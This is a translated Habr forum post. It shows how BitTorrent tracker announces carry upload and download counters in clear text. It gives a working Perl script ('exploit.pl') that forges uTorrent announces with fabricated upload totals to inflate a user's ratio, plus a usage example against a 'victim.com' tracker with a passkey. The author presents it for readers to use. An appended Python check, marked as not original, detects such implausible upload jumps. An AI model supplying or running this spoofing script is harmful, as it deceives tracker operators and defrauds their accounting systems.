
Vulnerability in Bittorrent protocol

Before reading the article I recommend that you familiarize yourself with the basic terms of this technology: http://ru.wikipedia.org/wiki/BitTorrent
A basic knowledge of Perl is also desirable.

Today the BitTorrent protocol is at the peak of its popularity. Hundreds and thousands of terabytes rush between peers every second over fiber-optic backbones and radio links. Millions of torrent files appear on the trackers. What can get in the way of this?

In this article I want to discuss and demonstrate the excessive openness and simplicity of the message exchange between a BitTorrent tracker and client. It may not be a vulnerability as such, because there is no real threat to the server or the client, but it can undermine the foundation of the network and drastically reduce the amount of real seeding. It is no secret that a user's ratio on a tracker is an indicator of activity. The lower it is, the more restrictions are imposed on the user, and a very low ratio can be grounds for account deletion. This is especially true for users behind NAT, because their upload is scanty. Let's delve into the client-server message exchange and try to increase the ratio.
I want to start by parsing the HTTP request that most BitTorrent clients send to the tracker (for a detailed description, refer to the relevant documentation):
GET announce.php?info_hash=%8bz%0d%9b%93%ac%7d%d0%90%60r%03%1b%2b%89%60p%08%96%2e&peer_id=-UT1600-%da%81%bc%ce4%9c%a0%c1k%81%a7%f9&port=6881&uploaded=35302368&downloaded=54454366434&left=177313792&key=F53CB1E7&numwant=200&compact=1&no_peer_id=1 HTTP/1.1
Host: myhost.com
User-Agent: uTorrent/1600
Accept-Encoding: gzip
Connection: Close


As you can see, all key parameters are transmitted in clear text, and this can be used. We substitute our own values into the header (how the variables are filled in is up to you, whether from the console or a GUI) and send it over a socket that was opened to the tracker beforehand, after converting the hex info hash into the percent-encoded form the tracker understands:
use strict;
use warnings;
use IO::Socket::INET;

# Arguments in the order of the usage example below (assumed mapping): tracker host and port,
# the torrent's info hash as hex, the uploaded and downloaded byte counts to report, and the passkey.
my ($host, $port, $info_hash, $uploaded, $downloaded, $passkey) = @ARGV;

# Convert the hex info hash into the percent-encoded form the tracker expects:
# split it into byte pairs, join them with '%' and prefix the first pair with '%'.
my @r = $info_hash =~ /(.{1,2})/g;
my $info = join('%', @r);
$info_hash = "%" . $info;

# The socket to the tracker (the text above assumes it has already been opened).
my $sock = IO::Socket::INET->new(PeerAddr => $host, PeerPort => $port, Proto => 'tcp')
    or die "cannot connect to $host:$port: $!";

# Build an announce that imitates uTorrent 1.75; uploaded and downloaded are whatever we chose.
my $request = "";
$request .= "GET /announce.php?passkey=$passkey&info_hash=$info_hash&peer_id=-UT1750-%fa%91%a4IE%22ys%fb%3cCc&port=6881&uploaded=$uploaded&downloaded=$downloaded&left=1037668352&key=E4DC5ED5&event=started&numwant=200&compact=1&no_peer_id=1 HTTP/1.1\r\n";
$request .= "Host: $host:$port\r\n";
$request .= "User-Agent: uTorrent/1750\r\n";
$request .= "Accept-Encoding: gzip\r\n";
$request .= "Connection: Close\r\n\r\n";

# Send the announce once; the tracker records the reported counters.
print $sock $request;


Check your profile and enjoy the resulting megabytes :)

Example of use:
perl exploit.pl <info_hash>
perl exploit.pl victim.com 80 1ea9a2766ce3323b3985fddf4a4d11fb 10551598080 0 7E4067D35AE85FF20BFB9D08DCA0E688980CEFB8

This article is written for reference only, and using this material may lead to the deletion of your account.

I would like to hear opinions on this issue and, of course, ways to solve it. I know of some anti-cheat tricks, but they do not seem very effective to me.
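One tracker-side check of the kind mentioned above, added here as an example and not part of the original post: it parses the announce line shown earlier and compares each announce with the previous one from the same passkey/torrent pair, flagging an upload delta that no real link could have produced in the interval. The 10 Mbit/s cap, the "sample-passkey" value and the constructed announces are assumptions.

```python
from urllib.parse import parse_qs, quote_from_bytes, urlsplit

# Cap for one peer's reported upload, bytes per second. Assumption: a 10 Mbit/s
# residential uplink; a real tracker would tune this per user or per swarm.
MAX_UPLOAD_BPS = 1_250_000

# The announce request line shown earlier on this page, reused here as parser input.
SHOWN_REQUEST = ("GET announce.php?info_hash=%8bz%0d%9b%93%ac%7d%d0%90%60r%03%1b%2b%89%60p%08%96%2e&peer_id=-UT1600-%da%81%bc%ce4%9c%a0%c1k%81%a7%f9"
                 "&port=6881&uploaded=35302368&downloaded=54454366434&left=177313792&key=F53CB1E7&numwant=200&compact=1&no_peer_id=1 HTTP/1.1")

def parse_announce(request_line):
    """Parse an announce GET line into a dict; latin-1 decoding keeps the raw 20-byte hash intact, returned as hex."""
    _method, target, _version = request_line.split(" ")
    fields = {k: v[0] for k, v in parse_qs(urlsplit(target).query, encoding="latin-1").items()}
    fields["info_hash"] = fields["info_hash"].encode("latin-1").hex()
    for k in ("uploaded", "downloaded", "left", "port"):
        fields[k] = int(fields[k])
    return fields

def make_announce(info_hash_hex, passkey, uploaded, downloaded, left):
    """Build a constructed announce line in the same shape as SHOWN_REQUEST."""
    ih = quote_from_bytes(bytes.fromhex(info_hash_hex), safe="")
    return (f"GET /announce.php?passkey={passkey}&info_hash={ih}&peer_id=-UT1600-sample&port=6881"
            f"&uploaded={uploaded}&downloaded={downloaded}&left={left}&numwant=200&compact=1&no_peer_id=1 HTTP/1.1")

class RatioWatch:
    """Tracker-side check: flag upload deltas between two announces that no real link could produce."""
    def __init__(self, max_bps=MAX_UPLOAD_BPS):
        self.max_bps = max_bps
        self.last = {}  # (passkey, info_hash) -> (timestamp, uploaded)

    def check(self, request_line, now):
        a = parse_announce(request_line)
        key = (a.get("passkey", a.get("peer_id")), a["info_hash"])
        prev = self.last.get(key)
        self.last[key] = (now, a["uploaded"])
        if prev is None:
            return "ok"  # first announce for this pair: nothing to compare against
        elapsed = max(now - prev[0], 1)
        delta = a["uploaded"] - prev[1]
        if delta < 0:
            return "suspicious: uploaded counter went backwards"
        if delta / elapsed > self.max_bps:
            return f"suspicious: {delta / elapsed / 1e6:.2f} MB/s claimed since last announce"
        return "ok"

# Constructed announces: an honest 30-minute interval, then a 10 GB jump in the same interval.
HASH = "8b7a0d9b93ac7dd0906072031b2b89607008962e"  # the info_hash carried by SHOWN_REQUEST
HONEST_1 = make_announce(HASH, "sample-passkey", 0, 0, 1_037_668_352)
HONEST_2 = make_announce(HASH, "sample-passkey", 1_500_000_000, 500_000_000, 537_668_352)
CHEAT = make_announce(HASH, "sample-passkey", 10_551_598_080, 0, 1_037_668_352)
```

A rate cap alone is only a first filter; a tracker can also compare the sum of uploads claimed by a swarm against the sum of downloads its peers report, since every byte uploaded must have been downloaded by someone.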

As for the formatting, please don't be too harsh, because the Habr wiki is closed.

Related links:
http://www.securitylab.ru/news/301042.php
http://ru.wikipedia.org/wiki/BitTorrent

Source: https://habr.com/ru/post/20271/
